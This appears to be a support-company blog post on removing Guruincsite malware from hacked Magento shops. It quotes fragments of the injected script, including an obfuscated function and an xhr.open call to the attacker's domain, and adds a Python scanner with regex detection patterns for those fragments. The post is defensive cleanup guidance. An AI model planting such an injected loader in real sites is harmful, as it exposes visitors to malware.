Since 17th Oct, we’ve been receiving website hack recovery requests from Magento shops infected with Guruincsite,com malware.

There are two variations of the malicious code – an obfuscated one (gibberish) containing function LCWEHH(XHFER1){XHFER1=XHFER1, and a plain-text one containing xhr.open('GET', 'http;//guruincsite,com/1,php'.


Most of the hack recovery requests were from sites blacklisted by Google, and as of this writing, Google has listed 8527 domains infected with this malware.

Website owners reported seeing the alert “The site ahead contains malware” in browsers, seeing “Malicious software is hosted on 1 domain(s)” when clicking on Google search results, or receiving a mail from Google Webmaster with the subject “[Webmaster Tools] Malware infection detected”.

[Update 20th Oct] – It appears that this Guruincsite malware is inserted using the infamous Neutrino Exploit Kit, which exploits the Shoplift vulnerability, for which patches were released in Feb 2015. So, your best defense is to upgrade/patch Magento ASAP.

As part of our website support service, we’ve been able to clean this malware from a majority of the sites within 2 hours and get Google to de-blacklist these sites within 4 hours. Here’s how we did it.


Removing the Guruincsite malware and de-listing from Google

As of now, the malware is seen to infect the Home CMS Page and Footer.
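
Before cleaning, it helps to confirm which stored content actually carries the injected script. The following is an added example, not code from the original post: a small scanner that checks exported content for the two variants quoted above. The location labels (cms_page:home, footer), the sample content and the generalised obfuscated-function heuristic are assumptions made for illustration.

```python
import html
import re

# Indicators built from the two fragments quoted in the post. The domain is
# matched with "." or "," so the defanged spelling used here also hits.
INDICATORS = {
    "plain-xhr-loader": re.compile(
        r"xhr\.open\(\s*['\"]GET['\"]\s*,\s*['\"]https?[:;]//guruincsite\s*[.,]\s*com",
        re.IGNORECASE),
    "guruincsite-domain": re.compile(r"guruincsite\s*[.,]\s*com", re.IGNORECASE),
    # Heuristic (assumption): generalises `function LCWEHH(XHFER1){XHFER1=XHFER1`
    # to any upper-case function that starts by assigning its argument to itself.
    "obfuscated-function": re.compile(
        r"function\s+[A-Z][A-Z0-9]{3,}\s*\(\s*([A-Z][A-Z0-9]{3,})\s*\)"
        r"\s*\{\s*\1\s*=\s*\1\b"),
}


def scan_content(fields):
    """Return sorted (location, indicator, line, snippet) tuples for every hit.

    `fields` maps a location label to the HTML/JS stored there (None allowed).
    """
    findings = []
    for location, text in fields.items():
        # Undo HTML entity encoding so &#39;GET&#39; is seen as 'GET'.
        normalized = html.unescape(text or "")
        for name, pattern in INDICATORS.items():
            for match in pattern.finditer(normalized):
                line = normalized.count("\n", 0, match.start()) + 1
                findings.append((location, name, line, match.group(0)[:60]))
    return sorted(findings)


# Constructed sample export; only the two quoted fragments come from the post.
SAMPLE_FIELDS = {
    "cms_page:home": "<h1>Welcome</h1>\n<script>var xhr = new XMLHttpRequest();\n"
                     "xhr.open('GET', 'http;//guruincsite,com/1,php');</script>",
    "footer": "<p>&copy; Shop</p>\n<script>function LCWEHH(XHFER1){XHFER1=XHFER1;}</script>",
    "cms_page:about": "<p>About our store.</p>",
}

if __name__ == "__main__":
    for location, name, line, snippet in scan_content(SAMPLE_FIELDS):
        print(f"{location}: {name} at line {line}: {snippet}")
```

Running the same scan again after cleaning, on a fresh export, confirms that no copy of either variant is left in the stored content.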

Cleaning Magento site home page

So far, the plain-text malware has been found in the home page content. It’ll look something like this:

To clean the malware, we edited the home page CMS by going to CMS >> Pages >> Home >> Content and deleted the malicious code as shown below: